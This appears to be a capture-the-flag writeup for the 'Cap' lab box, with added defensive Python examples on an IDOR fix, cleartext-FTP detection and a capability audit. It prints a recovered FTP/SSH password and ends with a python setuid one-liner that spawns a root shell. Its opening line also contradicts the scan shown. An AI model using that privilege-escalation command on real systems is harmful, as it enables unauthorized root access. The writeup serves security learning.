The nmap scan reveals only one port: Port 80 with an Apache web server.
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings:
The website shows a “security dashboard”.
After looking around a bit, I noticed that we can download PCAP data from /data/1, where the number increments with each request. With a bit of fuzzing, it turns out that there is also a /data/0, containing records that were created by some other user. Let’s download it and analyze it in Wireshark.
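The download endpoint described above is an insecure direct object reference: the record id is guessable and nothing ties it to the logged-in user. The following is an added example (not code from the dashboard on the box) that models the handler in plain Python, once with the missing ownership check and once with it added. Users, records and the `CaptureStore` class are constructed for the example.

```python
# Added example, not code from the dashboard on the box: a minimal in-memory
# model of the /data/<n> download handler, shown with the missing ownership
# check (the behaviour observed above) and with the check added. Names,
# records and users are all constructed for the example.
from typing import Dict, Optional, Tuple

Response = Tuple[int, bytes]  # (HTTP status, body)


class CaptureStore:
    """Stands in for the dashboard's capture table: sequential ids, one owner each."""

    def __init__(self) -> None:
        self._records: Dict[int, dict] = {}
        self._next_id = 0

    def create(self, owner: str, pcap: bytes) -> int:
        record_id = self._next_id
        self._next_id += 1
        self._records[record_id] = {"owner": owner, "pcap": pcap}
        return record_id

    def get(self, record_id: int) -> Optional[dict]:
        return self._records.get(record_id)


def vulnerable_download(store: CaptureStore, record_id: int, session_user: str) -> Response:
    """Serves any record that exists: the session user is never compared with the owner."""
    record = store.get(record_id)
    if record is None:
        return 404, b""
    return 200, record["pcap"]


def hardened_download(store: CaptureStore, record_id: int, session_user: str) -> Response:
    """Serves a record only to its owner. A foreign record gets the same 404 as a
    missing one, so the endpoint does not reveal which ids exist."""
    record = store.get(record_id)
    if record is None or record["owner"] != session_user:
        return 404, b""
    return 200, record["pcap"]


def build_demo_store() -> CaptureStore:
    """Constructed data: record 0 belongs to 'admin', record 1 to 'alice'."""
    store = CaptureStore()
    store.create("admin", b"\xd4\xc3\xb2\xa1 admin capture (constructed)")
    store.create("alice", b"\xd4\xc3\xb2\xa1 alice capture (constructed)")
    return store


if __name__ == "__main__":
    store = build_demo_store()
    print("vulnerable, alice asks for /data/0:", vulnerable_download(store, 0, "alice")[0])
    print("hardened,   alice asks for /data/0:", hardened_download(store, 0, "alice")[0])
    print("hardened,   alice asks for /data/1:", hardened_download(store, 1, "alice")[0])
```

In a real application `session_user` must come from the server-side session, never from a request parameter. Switching to random, non-sequential ids makes enumeration harder and stops the endpoint from leaking how many records exist, but it does not replace the ownership check.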
Inside the capture, we find an FTP login by the user “nathan” with the password “Buck3tH4TF0RM3!”. On the FTP server, we find the user flag. The password also works for the SSH login. Next, I ran linpeas, which flagged the box as vulnerable to two CVEs.
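The credentials were recoverable because FTP sends USER and PASS in cleartext on the control channel. As an added example (not part of the original writeup), the detector below does what a network monitor would do with such traffic: it parses a classic pcap by hand (Ethernet/IPv4/TCP), watches port 21 for USER/PASS pairs and raises an alert with the password redacted. The sample capture, the IP addresses and the password in it are constructed placeholders.

```python
# Added example, not part of the original writeup: a small detector for
# cleartext FTP logins in a classic pcap file. It parses Ethernet/IPv4/TCP
# by hand, watches the control channel (port 21) for USER/PASS pairs and
# reports the login with the password redacted. The sample capture below is
# constructed in code; the credentials in it are placeholders.
import struct
from typing import Iterator, List, Optional, Tuple

FTP_PORT = 21


def iter_pcap_frames(data: bytes) -> Iterator[bytes]:
    """Yield raw Ethernet frames from a classic (non-pcapng) pcap blob."""
    magic = data[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    if struct.unpack(endian + "I", data[20:24])[0] != 1:  # LINKTYPE_ETHERNET
        raise ValueError("only Ethernet captures are handled here")
    offset = 24
    while offset + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack(endian + "IIII", data[offset:offset + 16])
        offset += 16
        yield data[offset:offset + incl_len]
        offset += incl_len


def tcp_fields(frame: bytes) -> Optional[Tuple[str, str, int, int, bytes]]:
    """Return (src_ip, dst_ip, sport, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":  # not IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:  # not TCP
        return None
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_offset = (tcp[12] >> 4) * 4
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    return src, dst, sport, dport, tcp[data_offset:]


def find_cleartext_ftp_logins(pcap: bytes) -> List[dict]:
    """Alert once per USER/PASS pair sent to port 21; the password itself is never stored."""
    alerts: List[dict] = []
    pending_user = {}  # (client_ip, server_ip) -> username awaiting its PASS
    for frame in iter_pcap_frames(pcap):
        fields = tcp_fields(frame)
        if fields is None:
            continue
        src, dst, _sport, dport, payload = fields
        if dport != FTP_PORT or not payload:
            continue
        verb, _, arg = payload.decode("ascii", "replace").strip().partition(" ")
        if verb.upper() == "USER":
            pending_user[(src, dst)] = arg
        elif verb.upper() == "PASS" and (src, dst) in pending_user:
            alerts.append({"client": src, "server": dst,
                           "user": pending_user.pop((src, dst)),
                           "password_seen": bool(arg)})
    return alerts


# --- constructed sample capture (checksums left at zero; the parser ignores them) ---
def _frame(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split(".")))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp


def _pcap(frames: List[bytes]) -> bytes:
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1_600_000_000 + i, 0, len(f), len(f)) + f
    return out


CLIENT, SERVER = "192.0.2.10", "192.0.2.21"  # documentation addresses, constructed
SAMPLE_PCAP = _pcap([
    _frame(SERVER, CLIENT, 21, 49152, b"220 (vsFTPd 3.0.3)\r\n"),         # server banner, ignored
    _frame(CLIENT, SERVER, 49152, 21, b"USER nathan\r\n"),
    _frame(CLIENT, SERVER, 49152, 21, b"PASS PLACEHOLDER-password\r\n"),  # placeholder, not the real one
    _frame(CLIENT, SERVER, 49153, 80, b"GET /data/0 HTTP/1.1\r\n\r\n"),   # HTTP, ignored
])

if __name__ == "__main__":
    for alert in find_cleartext_ftp_logins(SAMPLE_PCAP):
        print("cleartext FTP login:", alert)
```

Run against a real capture with `find_cleartext_ftp_logins(open("capture.pcap", "rb").read())`. Each alert is a reason to rotate the account's password and to move the service to SFTP or FTPS, since the same parser that produced the alert is all an eavesdropper needs.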
╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034
Vulnerable to CVE-2021-3560
It also shows a capability set on the python3.8 binary:
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
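The capability string above reads as cap_setuid and cap_net_bind_service in the effective, inheritable and permitted sets. Since linpeas only prints the raw line, the following added example (not from the writeup or from linpeas) parses `getcap -r /` output, handles both the older "path = caps+eip" layout seen on the box and the newer "path caps=eip" layout, and flags capabilities that amount to root when an unprivileged user can run the file. The sample output is constructed; only its first line is the one from the box.

```python
# Added example, not from the writeup or from linpeas: an audit of file
# capabilities in the format printed by `getcap -r /`. Both the older
# "path = caps+eip" layout (libcap before 2.41, as on the box) and the newer
# "path caps=eip" layout are accepted. The sample output below is constructed;
# only its first line is taken from the writeup.
import re
import shutil
import subprocess
from typing import Dict, List, Optional, Set, Tuple

# Capabilities that amount to root when an unprivileged user can execute the file.
DANGEROUS: Dict[str, str] = {
    "cap_setuid": "process may change its UID, including to 0",
    "cap_setgid": "process may change its GID and supplementary groups",
    "cap_dac_override": "file permission checks are bypassed",
    "cap_dac_read_search": "file read/search permission checks are bypassed",
    "cap_chown": "file ownership may be changed",
    "cap_fowner": "owner-only operations are allowed on any file",
    "cap_setfcap": "file capabilities may be granted to other binaries",
    "cap_sys_admin": "broad administrative operations (mounts, namespaces, ...)",
    "cap_sys_ptrace": "other processes may be traced and controlled",
    "cap_sys_module": "kernel modules may be loaded",
}

CLAUSE = re.compile(r"^([a-z0-9_,]+)([=+-])([eip]*)$")


def parse_getcap_line(line: str) -> Optional[Tuple[str, Dict[str, Set[str]]]]:
    """Return (path, {cap_name: set of flag letters}) or None for a blank line."""
    line = line.strip()
    if not line:
        return None
    path, _, rest = line.partition(" ")  # paths containing spaces are not handled
    rest = rest.strip()
    if rest.startswith("="):             # old layout: "path = clause clause"
        rest = rest[1:].strip()
    caps: Dict[str, Set[str]] = {}
    for clause in rest.split():
        m = CLAUSE.match(clause)
        if m is None:
            raise ValueError(f"unrecognised capability clause: {clause!r}")
        names, op, flags = m.groups()
        for name in names.split(","):
            current = caps.setdefault(name, set())
            if op == "=":
                current.clear()
                current.update(flags)
            elif op == "+":
                current.update(flags)
            else:
                current.difference_update(flags)
    return path, caps


def audit_getcap_output(lines: List[str]) -> List[dict]:
    """Flag dangerous capabilities that are effective (e) or permitted (p) on a file."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        for name, flags in caps.items():
            if name in DANGEROUS and flags & {"e", "p"}:
                findings.append({"path": path, "cap": name,
                                 "flags": "".join(sorted(flags)),
                                 "why": DANGEROUS[name]})
    return findings


def audit_host() -> List[dict]:
    """Audit the running system; returns [] when libcap's getcap is not installed."""
    if shutil.which("getcap") is None:
        return []
    proc = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True)
    return audit_getcap_output(proc.stdout.splitlines())


# Constructed sample; the first line is the one linpeas reported on the box.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/perl5.30 = cap_setuid+p
"""

if __name__ == "__main__":
    for finding in audit_getcap_output(SAMPLE_GETCAP.splitlines()):
        print(f"{finding['path']}: {finding['cap']}+{finding['flags']} ({finding['why']})")
```

A permitted-only capability (the perl line in the sample) is still reported, because a process can raise a permitted capability into its effective set itself. If the interpreter only needed to bind a low port, cap_net_bind_service alone would have been enough; `setcap -r /usr/bin/python3.8` removes the file capabilities, and running `audit_host()` from a scheduled job and alerting on any change in its output catches such grants early.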
Since the box is called “cap”, this might be the intended attack vector. On GTFObins, we find the following entry for Capabilities:
If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.
Next, we execute the command as specified and get a root shell.
$ ./python -c 'import os; os.setuid(0); os.system("/bin/sh")'